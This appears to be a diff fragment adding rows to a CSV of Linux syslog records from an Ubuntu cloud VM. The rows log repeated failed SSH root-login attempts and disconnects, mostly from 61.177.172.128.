+8290,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:01:37,UbuntuDevEnv,2019-06-11 19:01:37,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,39482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8291,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:01:37,UbuntuDevEnv,2019-06-11 19:01:37,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 61.177.172.128 port 10521 ssh2],39482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,10521,,
+8292,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:01:37,UbuntuDevEnv,2019-06-11 19:01:37,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,39482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8293,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:01:37,UbuntuDevEnv,2019-06-11 19:01:37,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 10521: Too many authentication failures [preauth],39482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,10521,,
+8294,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:01:37,UbuntuDevEnv,2019-06-11 19:01:37,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 10521 ssh2 [preauth],39482,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,10521,,
+8295,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:01:41,UbuntuDevEnv,2019-06-11 19:01:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,39551,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8296,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:01:43,UbuntuDevEnv,2019-06-11 19:01:42,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 17608 ssh2,39551,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,17608,,
+8297,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:01:57,UbuntuDevEnv,2019-06-11 19:01:57,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,39551,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8298,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:01:57,UbuntuDevEnv,2019-06-11 19:01:57,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 17608 ssh2 [preauth],39551,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,17608,,
+8299,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:01:57,UbuntuDevEnv,2019-06-11 19:01:57,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 17608: Too many authentication failures [preauth],39551,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,17608,,
+8300,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:01:57,UbuntuDevEnv,2019-06-11 19:01:57,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 61.177.172.128 port 17608 ssh2],39551,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,17608,,
+8301,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:01:57,UbuntuDevEnv,2019-06-11 19:01:57,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,39551,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8302,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:02:01,UbuntuDevEnv,2019-06-11 19:02:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,39616,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8303,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:02:03,UbuntuDevEnv,2019-06-11 19:02:02,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 24962 ssh2,39616,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,24962,,
+8304,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:02:10,UbuntuDevEnv,2019-06-11 19:02:08,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 61.177.172.128 port 24962 ssh2],39616,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,24962,,
+8305,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:02:11,UbuntuDevEnv,2019-06-11 19:02:10,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 24962 ssh2,39616,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,24962,,
+8306,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:02:16,UbuntuDevEnv,2019-06-11 19:02:16,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,39616,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8307,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:02:16,UbuntuDevEnv,2019-06-11 19:02:16,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 61.177.172.128 port 24962 ssh2],39616,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,24962,,
+8308,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:02:16,UbuntuDevEnv,2019-06-11 19:02:16,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,39616,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8309,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:02:16,UbuntuDevEnv,2019-06-11 19:02:16,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 24962 ssh2 [preauth],39616,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,24962,,
+8310,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:02:16,UbuntuDevEnv,2019-06-11 19:02:16,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 24962: Too many authentication failures [preauth],39616,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,24962,,
+8311,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:02:21,UbuntuDevEnv,2019-06-11 19:02:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,39694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8312,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:02:22,UbuntuDevEnv,2019-06-11 19:02:22,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 32033 ssh2,39694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,32033,,
+8313,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:02:38,UbuntuDevEnv,2019-06-11 19:02:37,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 61.177.172.128 port 32033 ssh2],39694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,32033,,
+8314,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:02:38,UbuntuDevEnv,2019-06-11 19:02:37,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,39694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8315,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:02:38,UbuntuDevEnv,2019-06-11 19:02:37,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 32033: Too many authentication failures [preauth],39694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,32033,,
+8316,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:02:38,UbuntuDevEnv,2019-06-11 19:02:37,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,39694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8317,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:02:38,UbuntuDevEnv,2019-06-11 19:02:37,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 32033 ssh2 [preauth],39694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,32033,,
+8318,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:02:41,UbuntuDevEnv,2019-06-11 19:02:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,39768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8319,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:02:44,UbuntuDevEnv,2019-06-11 19:02:43,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 39717 ssh2,39768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,39717,,
+8320,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:02:58,UbuntuDevEnv,2019-06-11 19:02:58,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 61.177.172.128 port 39717 ssh2],39768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,39717,,
+8321,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:02:58,UbuntuDevEnv,2019-06-11 19:02:58,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 39717 ssh2 [preauth],39768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,39717,,
+8322,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:02:58,UbuntuDevEnv,2019-06-11 19:02:58,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,39768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8323,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:02:58,UbuntuDevEnv,2019-06-11 19:02:58,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,39768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8324,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:02:58,UbuntuDevEnv,2019-06-11 19:02:58,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 39717: Too many authentication failures [preauth],39768,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,39717,,
+8325,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:03:03,UbuntuDevEnv,2019-06-11 19:03:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,39833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8326,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:03:05,UbuntuDevEnv,2019-06-11 19:03:05,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 47289 ssh2,39833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,47289,,
+8327,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:03:10,UbuntuDevEnv,2019-06-11 19:03:08,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 47289 ssh2,39833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,47289,,
+8328,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:03:11,UbuntuDevEnv,2019-06-11 19:03:10,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 47289 ssh2,39833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,47289,,
+8329,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:03:16,UbuntuDevEnv,2019-06-11 19:03:13,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 47289 ssh2,39833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,47289,,
+8330,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:03:17,UbuntuDevEnv,2019-06-11 19:03:17,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 47289 ssh2,39833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,47289,,
+8331,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:03:20,UbuntuDevEnv,2019-06-11 19:03:20,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 47289 ssh2,39833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,47289,,
+8332,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:03:20,UbuntuDevEnv,2019-06-11 19:03:20,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,39833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8333,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:03:20,UbuntuDevEnv,2019-06-11 19:03:20,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 47289: Too many authentication failures [preauth],39833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,47289,,
+8334,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:03:20,UbuntuDevEnv,2019-06-11 19:03:20,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 47289 ssh2 [preauth],39833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,47289,,
+8335,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:03:20,UbuntuDevEnv,2019-06-11 19:03:20,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,39833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8336,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:03:25,UbuntuDevEnv,2019-06-11 19:03:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,39921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8337,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:03:26,UbuntuDevEnv,2019-06-11 19:03:26,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 55214 ssh2,39921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,55214,,
+8338,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:03:41,UbuntuDevEnv,2019-06-11 19:03:40,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 61.177.172.128 port 55214 ssh2],39921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,55214,,
+8339,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:03:41,UbuntuDevEnv,2019-06-11 19:03:40,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 61.177.172.128 port 55214 ssh2 [preauth],39921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,55214,,
+8340,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:03:41,UbuntuDevEnv,2019-06-11 19:03:40,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 61.177.172.128 port 55214: Too many authentication failures [preauth],39921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,55214,,
+8341,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:03:41,UbuntuDevEnv,2019-06-11 19:03:40,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,39921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8342,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:03:41,UbuntuDevEnv,2019-06-11 19:03:40,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,39921,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8343,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:03:44,UbuntuDevEnv,2019-06-11 19:03:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.177.172.128  user=root,39991,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,61.177.172.1,,0,
+8344,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 19:03:46,UbuntuDevEnv,2019-06-11 19:03:46,auth,UbuntuDevEnv,info,Failed password for root from 61.177.172.128 port 62735 ssh2,39991,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,61.177.172.1,62735,,
+8345,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 05:02:33,UbuntuDevEnv,2019-06-11 05:02:32,auth,UbuntuDevEnv,info,Disconnected from 159.65.148.178 port 54466 [preauth],109444,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,159.65.148.1,54466,,
+8346,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 05:02:33,UbuntuDevEnv,2019-06-11 05:02:32,auth,UbuntuDevEnv,info,Received disconnect from 159.65.148.178 port 54466:11: Bye Bye [preauth],109444,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,159.65.148.1,54466,,
+8347,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 05:50:03,UbuntuDevEnv,2019-06-11 05:50:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=42.227.172.82  user=root,119977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,42.227.172.8,,0,
+8348,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 05:50:05,UbuntuDevEnv,2019-06-11 05:50:05,auth,UbuntuDevEnv,info,Failed password for root from 42.227.172.82 port 39162 ssh2,119977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,42.227.172.8,39162,,
